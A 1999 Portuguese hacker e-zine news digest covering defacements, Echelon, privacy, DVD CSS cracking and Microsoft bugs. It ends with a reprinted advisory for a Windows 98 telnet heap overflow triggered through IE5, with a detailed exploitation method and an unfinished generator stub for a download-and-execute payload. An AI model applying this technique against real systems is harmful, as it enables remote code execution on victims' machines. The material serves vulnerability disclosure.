Página Inicialhttp://www.inf.ufsc.br/barata Email derneval@bigfoot.com Índice barata22.html


NEWS - DICAS - LINKS - HUMOR - MISCELÂNIA

Estão aparecendo hipóteses para deixar o homem mais ligado com o computador. A idéia é usar um chip para enviar impulsos nervosos ao cérebro e controlar a depressão. E a idéia está pegando adeptos lá nos EUA. Realmente, quem não se lembra o passado está condenado a repeti-lo. Não sou nada contra o bem estar das pessoas. Mas se é possível fazer um chip para controlar o estado emocional da pessoa, não seria possível fazer um chip para controlar a pessoa?
http://cnnenespanol.com/salud/1999/
10/12/marcapasos.cerebro/index.html


Saiu na Folha 14 de Outubro de 1999 - O cara suspeito de estar envolvido no grampo do BNDES, técnico Walter de Souza Braga foi funcionário da antiga TELERJ. Por estar envolvido em gravações ilegais já naquela época. Será que as telefônicas atuais estão com funcionários responsáveis e que zelam pela privacidade da comunicação do cidadão? Ou precisa aparecer um escândalo de grampo com gente graúda para o cidadão pode estar tendo seu telefone grampeado ou sua correspondência lida?


Será que não estão exagerando os danos provocados por hackers? Aqueles que estão acompanhando o caso Mitnick (http://www.freekevin.com) viram como, de uma hora para outras, as empresas supostamente atingidas por ações supostamente cometidas pelo hacker trouxeram estimativas que mais tarde foram comprovadas  "pouco acuradas". Começaram com $299,927,389.61 e depois caíram para meros $1.5 million (ver zdnn ).Nessa págin no http://www.aviary-mag.com/Martin/
Defacto_Damage/defacto_damage.html
, Brian Martin comenta algumas coisas interessantes. Como por exemplo, o SPA ( http://www.spa.org/piracy/programs/98table.htm ) pode avaliar prejuízos com a pirataria de software em exatos $3,074,266,000,00 ? Uma idéia é que existe uma necessidade de que o prejuízo atinja determinado valor para que valha a pena sua condenação. Então, US$ 10.000,00 é pra fazer o FBI se interessar. O número de zeros é para fazer o público prestar atenção na soma do prejuízo e começar a protestar.

Por outro lado, me lembro quando as primeiras notícias e emails sobre roubo de contas correntes ou de caderneta de poupança bancos via internet começaram a aparecer na Internet. Sempre o banco dizia que era culpa do cliente. Eram notícias esparsas e não muito detalhadas. A televisão mal noticiou qual os bancos eram mais afetados. Custou muito a admitir que pudesse haver falhas com o sistema de senhas, já que os alvos eram em vários casos, pessoas de idade. Precisou acontecer um número significativo de clientes afetados. Tudo isso para uma coisa que foi comprovada insegura há varios anos, pelo Chaos Computer Club, na Alemanha, ver http://www.ccc.de/radioactivex.html. Estranho, né? Ainda assim várias reportagens insistiram em falar que os responsáveis por essas fraudes por computador eram hackers. Ladrão de banco virou hacker, agora? Uma coisa que pode até estar sendo feita internamente é obra de hackers? Mais alguns sites sobre o assunto:

http://www.roachmill.demon.co.uk/demo/activex/index.htm
http://www.geog.ubc.ca/snag/bugtraq/msg00602.html http://www.microsoft.com/security/bulletins/ms99-037.asp



De acordo com o IDG Online, 16/08/99, o governo americano está procurando cybersoldados. Os caras vão ter que substituir 32 mil caras ano que vem, conta da aposentadoria.


Os caras que invadiram os sistemas da Nasa e do exército americano em 96 , os suecos Charlie Malm e Joel Soederberg, foram processados.. parece que serão multados, mas não vão puxar ferro por conta disso, já que nada foi roubado. http://dailynews.yahoo.com/h/ap/19990816/
wl/sweden_hackers_1.html

Tão falando que a lei de crimes de informática está chegando.. 3 anos de prisão no máximo e 4 se o crime informático for cometido contra o Estado. (InfoNews, 06/08/99) .

Essa foi muito legal: hackearam uma página anti-gay lá nos EUA. Achei engraçado, mas tambeém tem o fato que isso trouxe uma baita publicidade para a mesma.. http://cnn.com/TECH/computing/
9908/23/hack.folo/index.html
e http://www.wired.com/news/news/
politics/story/21351.html



Lembram do tal hacker israelense, aquele que virou manchete em todo mundo por invadir o Pentágono, lá nos EUA? Não sei se aconteceu alguma coisa a ele, mas o John Vranesevicc,ou JP, do Antionline, o site responsável pelas entrevistas com o cara e com muitos outros pretensos ratos de computador, tá na lama. Pior que titica de cavalo de bandido mexicano. O pessoal está direto desmascarndo o indivíduo como tendo feito um site de notícias  "hackers" pré-fabricadas. Uma idéia interessante: o cara quer se promover como pseudo cracker, hacker ou o que seja. Vai no Antionline (ia, agora a coisa tá brava). Faz uma coisa qualquer e divulga. Em outras palavras, criava notícia exclusiva para o site. Que apareceu na TV, começou a receber patrocinadores e coisa do gênero. Tá todo mundo tacando pedra. Veja umas partes da da história em http://www.attrition.org/negation/errata.html , http://www.forbes.com/columnists/penenberg/1999/0927.htm , http://www.hackernews.com/orig/CWD0899.html , http://www.nytimes.com/library/tech/99/
10/cyber/articles/08hackers.html
. Tá querendo ganhar dinheiro com hacking, tirou o Packet Storm do seu site, enrolou e enganou gente. Merece o que está recebendo. (origem: http://www.hackernews.com)


Vai rolar uma conferência hacker na Colômbia. Fui na página deles (http://colcon.virtualave.net ), algo pesado e difícil de entrar, precisa de Netscape 4.X. Pelo que entendi do FAQ, ainda estão decidindo coisas como preços, palestrantes, etc. A data vai ser 6,7, 8 e 9 de janeiro. Se eu tivesse dinheiro, talvez arriscasse. Talvez. A Colômbia está na relação World's Most Dangerous Places (Lugares mais perigosos do mundo). O Brasil por enquanto ainda não entrou na lista. É uma conferência local, pelo que entendi. Vocês me perguntam:  E no Brasil? Eu respondo: Tamos próximo da votação de uma legislação anti-hackers. Periga da elaboração de tal conferência estimular uma lei proibindo a mesma. Que tal? E uma conferência demora meses para ser organizada, quando não se tem dinheiro bancando.


FAMOSO SITE DEIXA DE EXISTIR - PQP JÁ ERA! - Veja uma parte da carta de despedida abaixo.

É o fim do mundo como nós o conhecemos

A partir do dia 01 de novembro de 1999, a PQP cessará suas atividades e deixará de existir. Foram mais de dois anos trazendo o que havia de melhor em humor e diversão na Internet. O aclamado, polêmico e divertido site que entrou para a história da Internet brasileira vai deixar uma lacuna em branco no coração de todos os fãs...mais de 12.000 acessos por dia...dezenas de reportagens, prêmios, indicações....mas nada dura para sempre.

Chega um momento em que você é obrigado a tomar decisões que vão influenciar o resto da sua vida...vivemos fazendo isso a cada minuto, a cada segundo, a cada decisão tomada, pois senão, ficamos presos no mesmo lugar, parados, até a morte.

E, por esse motivo, a PQP tem que deixar de existir. Para que venham novas idéias, para que surjam novos horizontes, para que cresçam novos ideais, para que possamos enfrentar novos desafios!

Agradecemos a todos por esses dois anos inesquecíveis, onde aprendemos e crescemos muito, como pessoas e profissionais. Fica aqui um grande abraço, e a promessa de que esse não é um adeus - e sim um até logo!

A gente se vê por aí!

A Ex-Equipe PQP


O FBI fez um vídeo sobre hackers e high-tech crime. Pra ver se encoraja as empresas a divulgar os problemas que tem com crime por computador. O pessoal lá da Hackernews e computer underground está doidinho da silva pra botar a mão numa cópia desse vídeo. Eu também. Porquê? Porque existem crimes por computador feitos por funcionários de dentro das próprias empresas. E algumas empresas não revelam nada não é só por temor de parecerem incompetentes. Mas também por medo de exporem estruturas de comando deficientes, gastos mínimos com treinamentos ou sei lá, quem sabe, existência de caixa 2? Pra não falar em desavenças trabalhistas que geram funcionários rancorosos capazes de ir a forra via computador.. É, talvez o vídeo convença Enfim.. essa notícia tá no URL: http://dailynews.yahoo.com/headlines/local/state/
colorado/story.html?s=v/rs/19991118/co/index_2.html#3
Mas achei melhor o que li na Gazeta Mercantil, tem um caderno de TI (Tecnologia de Informação) e estavam falando justamente de hackers, segurança informática e assemelhados. Só que colocaram umas estatísticas legais: os invasores externos representam o maior medo de administradores de sistemas. Mas o que causa maior dano é o usuário destreinado. Esse é o que ainda provoca maior dano, vindo os usuários não autorizados em seguida ( O principal 'hacker' está na empresa São Paulo, 8 de junho de 1999, Perigo maior está na falta de treinamento SÃO PAULO, 21 de setembro de 1999). Os invasores externos contam menos de 15% dos prejuízos, segundo mapa fornecido pela Ernst&Young. Em primeiro lugar estão as falhas de sistemas 67%, Erros não intencionais com 61%, Vírus com 46%, etc Mas o medo dos hackers lidera no  öque as empresas mais temem". 49%, vindo o medo de Funcionários não autorizados em seguida, com 46%.
Ano 2000 está chegando.. vc já cancelou seu cartão de crédito? Ouvi um papo que os bancos não estão preparados para o bug do milênio.


Um "hacker" enviou uma cartinha pro IDG! Falando que ia abandonar essa vida de crimes. Achei meio estranho, podia enviar pro Barata Elétrica. Mas tudo bem, eu demoro, mas publico. Tá lá embaixo, a dita:

"Aviso:

Este texto foi escrito por globher, e pode ser distribuído e publicado por
qualquer brasileiro, contanto que não modifiquem seu conteúdo.

Como a maioria dos "hacks" são feitos:

A maioria dos hackers utiliza um método bem simples para hackear sites, eles
hackeiam usando o FrontPage Explorer.

Fixando seu servidor:

Para fixar seu servidor, basta remover as extensões do FrontPage ou
configurar as permissões dos arquivos criando contas ou colocando a conta
guest para somente leitura.

Extras:

Espero que este texto ajude você a fixar seu servidor e a evitar ataques
hackers. Mas lembre-se, nenhum servidor é 100% seguro.

Por que escrevi este texto:

Esta é a ultima vez que devo acessar a Internet, por um bom tempo pretendo
sair do mundo underground, pois percebi que hackear sites não ajuda em nada
a melhorar o Brasil. Neste e-mail você encontra um texto escrito por mim
explicando como fixar os servidores e aconselhando os jovens a não fazer o
que eu fiz. Sinta-se livre para publicá-lo em seu site.

Eu percebi que não é hackeando sites e prejudicando administradores que eu
vou ajudar a melhorar o Brasil. Percebi que eu posso ajudar mais, dando
comida a um faminto do que hackeando sites e colocando a culpa da situação
atual do Brasil em outras pessoas.

P.S.: Eu não quero amenizar minha culpa por ter hackeado sites. Escrevi este
texto para evitar que outras pessoas façam o que eu fiz

Deve ser por isto que um outro "hacker" que invadiu a NASA deixou sua mensagem lá. (contribuicao da Eliz, a feliz)
---------

NASA owned??? nice to meet you NASA
hehehe... i'm so happy!!! i'm in the moon
ae gov brasileiro... nos nao vamos parar!!!! deixe o globher em paz.. e um garoto
ainda....e globher, vc nao e o mister M p/ revelar os segredos!

control-C,Inferno.br, ninguem pode nos parar

o novo milenio esta ai.. e tempo de recomeçar

JxLxMx (saindo de ferias por enquanto)

http://www.attrition.org/mirror/attrition/1999/11/28/acquisition.jpl.nasa.gov/


Só pra aproveitar, o grupo Infernobr me mandou esta cartinha:

Oi Derneval,

vc q sempre acompanhou a cena brasileira e concedeu um espaco na BE, estamos 
reportando algo interessante

Ordem dos advogados do Brasil (OAB) - www.oab.org.br
foi hackeada pelo grupo inferno.br hoje (segunda).

Veja o mirror no site da Securenet
http://www.securenet.com.br/mirror/nov99/www.oab.org.br

Veja a reportagem na IDG
http://www.uol.com.br/idgnow/inet/inet1999-11-29e.shl

Veja a reportagem na Securenet
http://www.securenet.com.br/cgi-bin/news?query=29119906

Valeu terem enviado, mas pessoalmente, não acho isso interesante. Vai estourar numa lei anti-hacker bem severa. E a OAB não é exatamente culpada da quantidade de problemas que assola o pais (muito embora alguns advogados "péssimos" tenham passado no exame da ordem). Sou pela ordem. Este troço de haquear páginas do Governo para aparecer não é a minha praia. Até o Governo fala mal do governo, hoje em dia. Eu acredito que o que eles querem e' estimular a entrada de uma legislacao anti-hackers. Pelo que pude descobrir varios sao caras entre 20 e 35 anos, com solida carreira na informatica. Sao analistas de sistemas querendo faturar como analistas de segurancas bem remunerados. Num dos casos, os caras ja' haviam feito analise das insegurancas dos sites do governo. Que tem mania de usar software da microsoft cheio de aberturas. As noticias desse gênero deixam meio p(*) da vida um pessoal responsável por outros sites, baseados em Unix, que estão patcheados e ninguém entra. Achar um site inseguro e' questão de procurar.


Versão final do regulamento para uso das redes de TV por assinatura pelos provedores de Internet finalmente sai. A Anatel publicou a coisa. Resta saber se vai funcionar. Espero que sim. Muita gente vai passar a noite em branco, ao usar internet via TV a cabo. http://www.anatel.gov.br/home/default_popup_flash.asp
O linux vai virar o sistema operacional oficial do governo chines. Pois e', O que a Microsoft não conseguiu, a GraphOn foi la' e fez. Ponto para a Geração GNU. http://uk.news.yahoo.com/991110/22/ax8w.html

Esta foi de amargar.. um sujeito escondeu um telefone celular lá dentro para contrabandea-lo dentro de uma prisão a 150kms de Bogotá, na Colômbia (11/10/99).. ia ganhar 100.000 pesos se conseguisse. http://cnnenespanol.com/rarezas/1999/10/11/telefono.ap/index.html


Um grupo criminal russo conseguiu acesso ilegal ao servico de noticias da Reuters. A parte mais chata da coisa e' que eles estavam vendendo esse acesso. Nao houve uma grande esperteza nessa estoria. Os caras simplesmente contrataram os servicos atraves de uma empresa de fachada. http://library.northernlight.com/FC19991102530000207.html?cb=0&dx=1006&sc=0#doc

Romania: Algum "esperto" entrou numa pagina do governo e alterou a taxa de cambio do dolar e o imposto do salario do trabalhador. Por um dia, a coisa funcionou, quer dizer, ninguem notou. Ainda estao investigando a hackeada. Ate' que foi algo nao muito terrivel, porque qualquer pessoa que olhasse iria notar uma taxa de 100% de imposto em algumas profissoes (variava de acordo com a desimportãncia). http://news.cnet.com/news/0-1005-200-1427148.html?tag=st.ne.ron.lthd.1005-200-1427148


MTV FOI ENGANADA.. Os caras resolveram fazer uma reportagem sobre hackers para um programa da MTV, chamado Vida Real. (True Life: I'm a Hacker). A idéia é aquela mesma que todos os jornalistas já tiveram. Porque não pegar um cara que já fez crimes informáticos e botar ele para contar sua história. Conseguiram um sujeito, de nome Shamrock, que concordou em explicar tudo, tudinho. De acordo com o cara, ele nunca esperou que a MTV realmente  "engolisse " a história que tinha inventado. Na página http://www.hackernews.com/orig/shamrock.html tem um bom relato da história. Primeiro, os caras da MTV pediram uma help pro sujeito, que fazia um lance de Web TV onde o espectador tem acesso ao cara da reportagem e a outros espectadores que estejam assistindo o programa (ver parstv.com) Aí o sujeito passou para eles alguns sites básicos, gente nos EUA que mexia com o assunto, tipo 2600, HNN, Defcon e L0pht. A MTV foi atrás desse pessoal, filmou e prometeu pra todo mundo que seria algo  "honesto". Mas não era o suficiente para a direção do programa, eles queriam algo  "mais underground". Então é que o pessoal do Shamrock fez a armação toda. Parece que incluía cenas do sujeito "invadindo" sites, passando informação  "sigilosa" em disquete, fugindo da polícia. Esse tipo de coisa. E os caras da MTV  "engoliram". O Emmanuel Goldstein da 2600.com, até comentou como foi em http://www.hackernews.com/orig/emmanuel.html . Disse que concordou com a filmagem principalmente porque poderia ajudar o Mitnick. Para finalizar, cheguei a ver a página do programa, antes de tirarem do ar. Infelizmente não fiz download das gifs, htms e RAs, no dia seguinte não estavam mais lá. Eles se deram conta da mancada que deram e que foi noticiada por aí, veja em:  http://www.zdnet.co.uk/news/1999/41/ns-10798.html

A moçada lá resolveu fazer  "passeatas eletrônicas" contra a "escuta internacional". Aqueles que leram meu artigo sobre isso, já conhecem o lance (disponível em grande20.html ). Pra simplificar, tem um monte de escutas nas redes de comunicação do mundo inteiro. Essa escuta beneficia só alguns países e governos. Como envolve correio eletrônico, a moçada estava se propondo a emitir correios eletrônicos cheios de palavras chaves, para confundir e ativar os programas de escuta (que nem acordar aqueles caras que só prestam atenção em conversas que tem assuntos que interessam, como dinheiro, mulher, falando essas palavras). Existe alguma coisa sobre essa campanha na página http://cnn.com/TECH/computing/9910/22/internet.spying.ap/index.html . Que fez sucesso pois foi publicada em jornal. SE realmente conseguiram confundir as escutas? Provavelmente não, mas divulgaram sua existência, algo antes considerado como paranóia.

O pessoal esta' cada vez mais publicando noticias do ECHELON. Depois de fazerem um dia anti-echelon, cada vez mais aparecem artigos na imprensa nao especializada. Para quem nao sabe, esse sistema espia cada fax, telefone ou correio eletronico que passa pelos satelites do mundo. Transforma voz em texto e procura palavras chaves, como "terrorismo", "matar presidente dos EUA", etc. Se detecta essa ou aquela palavra de uma lista, ele comeca a copiar a comunicacao onde "escutou" a coisa. Para posterior exame. O dia do Echelon era uma ideia de entupir a rede com palavras que fizessem soar o alarme. Especialistas acreditam que a coisa do ponto de vista de software, nao funcionou. Mas em propaganda, parece que sim, porque mais e mais publicacoes estao alertando para algo do qual nao se falava. Ver os links abaixo:

http://news.bbc.co.uk/hi/english/world/newsid_503000/503224.stm http://xechelon.org/

http://www.fcw.com/pubs/fcw/1999/1115/web-echelon-11-18-99.html


Foi constatado que a companhia responsavel pelo software RealNetworks' RealJukebox esta' fazendo "escuta nos habitos dos seus usuarios. Quer dizer, o sujeito que usa o software acima tem suas preferencias em relacao a musicas, o que ouve e o que GRAVA. Ou seja, ao fazer download de uma musica a partir da internet, jogar uma musica do cdrom no seu micro ou simplesmente tocar esta musica no seu leitor de CDROM, isso e' informacao que e' armazenada, reunida num GUID (Global User Identification Data?) e mandado depois para a empresa. O perigo nao esta' tanto no ato em si. Mas se voce pensar no sonho do Bill Gates, de fazer todo mundo usar uma carteira contendo cada minuto de sua vida, isso e' perigoso. As pessoas nao podem ser vigiadas quando vao no banheiro ou quando gastam seu tempo livre. Hoje, se vigia qual musica voce gravou de um CD. Amanha, vao te cobrar um taxa por ter feito isso. Ja' pensou?

http://news.cnet.com/news/0-1005-200-1425866.html?tag=st.ne.1002.thed.1005-200-1425866

Depois que descobriram isso, a companhia mudou um pouco a política interna de privacidade

http://home.cnet.com/category/0-1005-200-1426044.html


Um artigo da Wired esta' colocando o Richard Smith como um "tesouro vivo" da Internet. E', ele ajudou a localizar o autor do Virus Melissa, a questao do GUID (um numerozinho que fica nos documentos feito pelo word 97 e que permite voce atribuir um arquivo como sendo feito num computador de fulano XXX), as praticas de coleta de dados da RealNetworks (que fornece um software de escuta de CDs pra micro onde as preferencias do usuario sao armazenadas e enviadas pra RealNetworks, uma forma de se fazer pesquisa de opiniao de musica sem o cara estar sabendo). O artigo sobre ele comenta seu interesse "desinteressado" pela privacidade na internet. Acho otimo ter um cara desses por ai'.. o duro e' acreditar que o cara e' um bom samaritano, mas legal que gente como ele exista. Palmas pra ele. http://www.wired.com/news/technology/0,1282,32252,00.html


Trata-se de uma historia sobre um jogo de guerra desenvolvido e executado para simular uma acao real de conflito em que ataques de forma eletronica sejam executados. Para quem nunca jogou "WAR", esta simulacao nao precisa envolver computadores. Apenas se joga com umas variantes, como "organizacao terrorista usa computador pra sacanear com sistema telefonico" e por ai' vai. Como se considera atualmente que os EUA estao despreparados para ataques desse tipo, a inteligencia norte americana comecou a fazer uns estudos de simulacoes desses acontecimentos. Maiores informacaoes na pagina. http://www.latimes.com/news/asection/19991031/t000098778.html

"Uma típica Sexta a tarde de chuva, em São Paulo [..] : ruas cheias de lixo com inundação, rios nas principais avenidas, trabalhadores presos no tráfego por horas, blackouts e fones não funcionam.." http://news.excite.com:80/news/r/991119/15/tech-yk-latam Este artigo comenta que os latino-americanos (nos brasileiros incluso) estamos tão acostumados com enchentes, desgraças de todo tipo que nem levantamos o olho para uma coisa chamada Y2K. Parece que foi um brasileiro(a) (da Mary Milliken) que escreveu o texto, está muito engraçado.


Uma tentativa de impedir que qualquer um tenha acesso a sua informacao medica. Ou seja, se voce ja' foi alcoolatra, se ja' transou sem camisinha (contraiu sifilis) ou coisas que podem ser embaracosas em algum momento de sua vida (como numa entrevista pra emprego). O presidente Clinton fez um plano que coloca restricoes em como essas informacoes estao sendo usadas. As pessoas envolvidas teriam que ser notificadas quanto ao uso das informacoes e deveriam ter facilidade para altera-las. Claro que nao e' tudo o que se espera. So' a partir de 21 de fevereiro e' que isso vai acontecer. Aqui no Brasil, mal se tem o habeas data e poucos advogados sabem usa-lo. http://www.zdnet.com/zdnn/stories/news/0,4586,2384723,00.html?chkpt=zdnntop

Quebraram a protecao de filmes DVD Hoje, os arquivos dvd nao sao copiaveis. Sao filmes de cerca de 4.7 Gigabytes em diante. A partir do ano que vem, se espera uma geracao de gravadores que permitam esse tipo de coisa, vao pintar drives DVD regravaveis pro publico comum. Entao, presumindo que um cara realmente quisesse usar isso, os CDs DVD estao protegidos por um software chamado Content Scrambling System (CSS), que usa chaves de 40bits. Era considerado um esquema de protecao forte. Mas uma empresa esqueceu de encriptar a chave do DVD e 2 caras descobriram mais info sobre o esquema de protecao. Fizeram um programinha de 60kb, o DeCSS, capaz de copiar o bagaca toda. Cada disco teria umas 400 chaves de descriptografacao. A ideia era que nao se pudesse fazer engenharia reversa e descobrir como funciona o software. Mas bastou esse descuido e agora esta informacao esta' por ai', rolando em algum lugar da NET. http://www.wired.com/news/technology/0,1282,32263,00.html

O Bruce Schneier, grande especialista no assunto (tô caindo de sono, esqueci o livro do cara) botou um texto sobre o assunto, disponível em http://www.zdnet.com/zdnn/stories/comment/0,5859,2391975,00.html

O pessoal que faz os DVDs é que não tem muito senso de humor, estão fazendo uma caça as bruxas e várias páginas sobre o assunto, muito bem desenhadas mesmo estão saindo do ar, por medo de represálias de vários tipos. O software ainda pode ser encontrado em alguns lugares e um  "Digest " sobre DVD está se mantendo no ar, apesar dos pesares. Quem procura, acha. http://www.wired.com/news/politics/0,1283,32449,00.html


Ainda existe esperanca. O congresso norte-americano nao esta' financiando a fundacao de uma rede de seguranca contra intrusos. E' aquela coisa.. a intencao explicita seria combater terroristo on-line. Mas e' uma coisa que pode ser usada para vigiar pessoas online e off-line. Resultando que poderia ser usada para invadir a privacidade de gente como a gente. Ainda bem que la' nos EUA estao brecando isso. Apesar que tambem se esta' falando que os defensores do projeto vao continuar tentando.http://www.govexec.com/dailyfed/1199/110399b3.htm


Informe Oficial da II Expo Salt Dias 29 e 30 de Janeiro de 2000 Rio de Janeiro - Niteroi

A ExpoSALT oferece à comunidade acadêmica o II Evento de Sistemas Alternativos, com a presença de Grupos de Usuários de Linux, AMIGA, OpenBSD, BeOS, MSX, FreeBSD entre outros.

O evento será realizado nos dias 29 e 30 de janeiro de 2000, na Escola de Engenharia da UFF - Av. Passos da Pátria, 50 - Campus da Praia Vermelha (Praia da Boa Viagem), na cidade de Niterói/RJ, este além das Palestras Tecnicas que ofereceremos, teremos: Mini-Cursos, Foruns de discurssão, Feira de empresas, Stands de Grupo de Usuários/Empresas e o 1o Install Fest de Linux Carioca.

A Associação SALT tem como o objetivo à divulgação de atividades nas áreas de sistemas alternativos, em andamento ou recentes, e incentivar a integração e o intercâmbio entre empresas, professores programadores e estudantes de diversos centros do país.

Assim, reunimos uma vez por ano, em Janeiro, para a realização do único evento voltado a sistemas operacionais alternativos e que tem como objetivo principal a divulgação de e a apresentação de soluções em informática baseada nos mesmos.

A ExpoSALT 2000 contará com palestras/apresentações sobre os seguintes sistemas operacionais e/ou plataformas alternativas:

- Amiga (AmigaOS) - BeOS - FreeBSD - Linux - MacIntosh (MacOS) - OS/2 - QNX - Tropix - DosVOX

Maiores informações (incluindo descrições mais detalhadas das palestras e informações sobre os ministrantes) podem ser encontradas na página do evento: http://www.wb.com.br/exposalt.

Informações sobre as inscrições para o evento também podem ser encontradas na mesma página.




NÃO É PIADA

Isso apareceu na lista Piadas -l

> Recebemos recentemente um aviso sobre um novo golpe que está
> sendo praticado e gostaríamos de alertá-lo sobre este golpe:
> > "Assaltantes astutos estão atacando de uma nova forma. Mandam
> mensagens falsas para seu e-mail, fazendo-se passar por seu
> provedor e pedindo para que você confirme o seu endereço
> residencial para recadastramento.
> > Utilizam-se de e-mail fantasma, geralmente HOTMAIL, ZIPMAIL ou
> MAILBR. Com o endereço em mãos, organizam um assalto à sua
> residência. Talvez após dias ou até mesmo meses.
> > Segundo a Polícia, estes bandidos estudam o seu cotidiano e,
> quando encontram uma brecha, realizam o assalto. Muitos casos
> semelhantes aconteceram em São Paulo e, depois de longas
> investigações, descobriram que as vítimas tinham algo em comum:
> eram Internautas.
> > Quando verificados mais detalhes, uma surpresa: todos haviam
> recebido esse e-mail, solicitando a confirmação do endereço e
> de alguns dados como: quantos aparelhos de televisão em casa,
> aparelhos de som, veículos, casa própria ou não, etc..., ou
> seja, perguntas típicas de cadastramento mas que, na verdade,
> servem de informação para os assaltantes saberem dos bens que
> existem na casa a ser assaltada.

Sobre a Microsoft..

Grande BUG - O Service Pac 6 da Microsoft impede o acesso ao LOTUS NOTES. Essa é curiosa. Porque o único jeito de usar o programa nesse caso seria fazer o NT dar privilégios de super usuário para os usuários comuns. Ou isso, ou as mensagens "Could not connect to server" "Access denied" aparecem.(fonte:Noticias Hispasec - 16-11-99) Quando me lembro que a prefeitura de São Paulo tem uma intranet baseada no Lotus Notes, fico pensando o que é atualizar os NTs de lá. Qualquer funcionário do baixo escalão podendo olhar mensagens do alto escalão (claro que tem ser bonzinho em computador) sem grandes problemas. Para ler mais:
http://support.microsoft.com/support/kb/articles/Q245/6/78.asp
http://news.cnet.com/news/0-1003-200-1439342.html?tag=st.cn.1.lthdne http://infoworld.com/cgi-bin/displayStory.pl?991116.pinotesbug.htm
Página comentando que a principal causa de perda de dados são apagamentos acidentais. Num teste realizado com 300 administradores de maquinas NT, 88% disseram que a principal causa de perda de dados sao apagamentos acidentais. 7% dao como causa apagamentos intencionais e 3% poem a culpa em virus. O uso inadequado de backups e' uma constante nessa percentagem de perda de dados. http://www.techweb.com/wire/story/TWB19991029S0008


Achado vírus de NT, o WinNT.Infis. Normalmente isso parecia coisa acadêmica, mas o bicho não só existe como foi encontrado  "in natura" (descoberto por uma vítima na Rússia). Ataca estações de trabalho operando com NT 4 e service packs 2,3,4,5 e 6. É um novo capítulo nessa história (Network World Online 11/10/99)

Falas-se da decisao de um juiz federal nos EUA. Finalmente se julgou a Microsoft culpada de monopolio. Pelas seguintes razoes: mercado amplo e estavel em todos os pcs baseados em chips intel, praticas anti-competicao etc.. Isso vai facilitar muito para outros processos contra a empresa, ja' que nao terao que provar o mesmo tipo de coisa (se fosse no Brasil, essa vitoria nao significaria nada pra quem estivesse correndo processo contra a Microsoft). Pode ser que isso signifique o desmembramento da empresa. http://cnnfn.com/1999/11/05/technology/microsoft_finding/


O site da Microsoft foi invadido. Ver http://www2.uol.com.br/info/infonews/101999/26101999-19.shl ouou http://www.msnbc.com/news/327726.asp?cp1=1

Como se livrar do Explorer no Win 98 http://www.98lite.net.


Recebi essa cartinha.. valeu Enigmatic

Heap Overflow in windows 98 Telnet.exe - remote via IE5
------------------------------------------------------------
Jeremy Kothe (jeremy@edi.com.au or paceflow@hotmail.com)

More fun and games courtesy of Microsoft (c:)...

Telnet.exe - (77824 bytes, 11th May 98)
---------------------------------------
This version of Telnet (which ships as part of Windows 98)
has a bug which allows a heap overrun. It assumes
that the first command-line argument will be <255 chars
when preparing for the "Connect Failed" message-box. The
result is that a few crucial bytes can be written over,
which, as the telnet app is closing, allow full execution
of arbitrary code. See below for full details...

This is still all local, though, so let's skip to the
REMOTE part.

IE 5.00.2314.1003/5.00.2314.1003IC
----------------------------------
Internet Explorer automatically invokes telnet when given
an "rlogin:", "telnet:" or "tn3270:" protocol URL. Earlier
versions of IE which I experimented with had comparitively
tight restrictions on the format of the url, only allowing
two parameters through (two zeros to you and me ;) As it
turns out, this is not enough (for me) to exploit the bug.
But with the versions named above, which as of writing
include the latest version Microsoft would let me
download, the restrictions seem to have been lifted. I can
only assume that this is either unintentional, or that
tn3270 or telnet applications have been found which makes
this desirable... Whatever! The end result is that it
seems the most recent versions of IE 5 will faithfully
pass any collection of parameters up to about 460 chars
into telnet.exe.

Systems at risk
---------------
Windows 98 default installation with SOME versions of IE5.
If you click on a link, or are refreshed to a link, then
see telnet.exe pop-up, complaining that it can't connect
to a garbage-type address, DO NOT close the telnet
executable. Instead, either forcefully terminate the
process, or reboot. The exploit does NOT take effect until
telnet.exe is closing.

Solution
--------
Either remove telnet.exe from the path, so IE cannot launch
it, or get a copy of the WinNT telnet.exe.

Exploit - introduction
----------------------
Heap overruns are not for the faint of heart. If you have
trouble following stack overrun exploits, turn back now -
or go and learn, then come back.

With a stack overflow, getting the machine to execute into
our buffer is relatively easy. We have, after all,
overwritten the function return address. Point this
(indirectly or not) at the esp and you're in business.
Without this benefit, we have a much tougher time
exploiting the overrun. In fact it is entirely possible
that no exploit is possible.

It all depends on what follows our buffer in memory.

The best candidates for overwriting are pointers. If we can
overwrite one which the program subsequently uses, we have
a chance to make something happen.

The trick is to ignore what the program is trying to do,
and to look at what it's doing.

One core idea I've found to be of value is this: One way to
get execution onto the stack is to find a way to manipulate
our uncorrupted stack. Often you will find a pointer to the
stack (or command-line) somewhere not far from the top (of
the stack). If it can be moved only a few bytes, or we can
conspire to pop more than we push, we can then return to
our buffer.

Exploit - Intermediate - (Tools: SoftICE/IDA/PSEDIT)
----------------------------------------------------
The overrun we are presented with is only a handfull of
bytes, just enough to overwrite one pointer value following
the buffer in memory. This pointer, as it turns out,
originally points to an array of 1024 pointers, which are
either NULL, or point in turn to a 16-byte structure. From
context this seems to be a file-handle table of sorts.

When I examined the routine (fflush) where we end up
referencing the pointer, it turns out that the code
iterates thru the 1024 pointers, and for each non-NULL
entry, it examines and conditionally changes the 16 byte
structure pointed to. It is the change we are interested
in.

If the structure is represented as:
DWORD dw1, dw2, dw3

then the effect of the change is:
dw1 = dw3
dw2 = 0

Whilst examining various locations in memory where out
exploit string ends up (there are a couple, as the
command-line get passed, then parsed), I found one where
the following 4k was allocated and 99% zeros.

I also found at the top of the stack, about 12 bytes back,
a pointer to our exploit string (WinMain lpCmdLine anyone),
which was ripe to be copied down 8-bytes to overwrite a
return address.

Now ideally, if the memory I found was all blank, all I'd
need to do would be to arrange for the trailing bytes of my
exploit string to point to the appropriate place on the
stack. This last DWORD, followed by 1024 DWORD zeros, would
serve as a faux handle table which would overwrite a return
address with a pointer to our exploit.

Are you with me... If not, go back now.

In the actual case I found there were indeed 1024 zeros,
but there was also one non-zero DWORD directly after my
exploit and before the zeros. I needed to remove these
values for the table to not crash... so I used the same
technique over again to remove it - adding another entry at
the top of our table pointing to the offending location
neatly removes it, then the second entry does the actual
work, and the rest of the table is empty.

Done. Complete. Works.

Exploit Attached
----------------
I have worked out an exploit which downloads and runs an
arbitrary file, and have included the source for a Visual
C++ program to create a binary file containing the exploit
as a link. Add (for example) an html header and footer, and
you have it.

Notes: The exploit uses URLDownloadToCacheFile and WinExec.
Disassembling the binary file will show you the code
(strings have been xor'ed with 0xFADE).
Any comments on the exploit code would be appreciated.

------------------------------------------------------------
#include
#include
#include


void Usage( void ) {
printf( "Usage: exfact url(40) outfile\n" );
}

#define URL_OFFSET 48

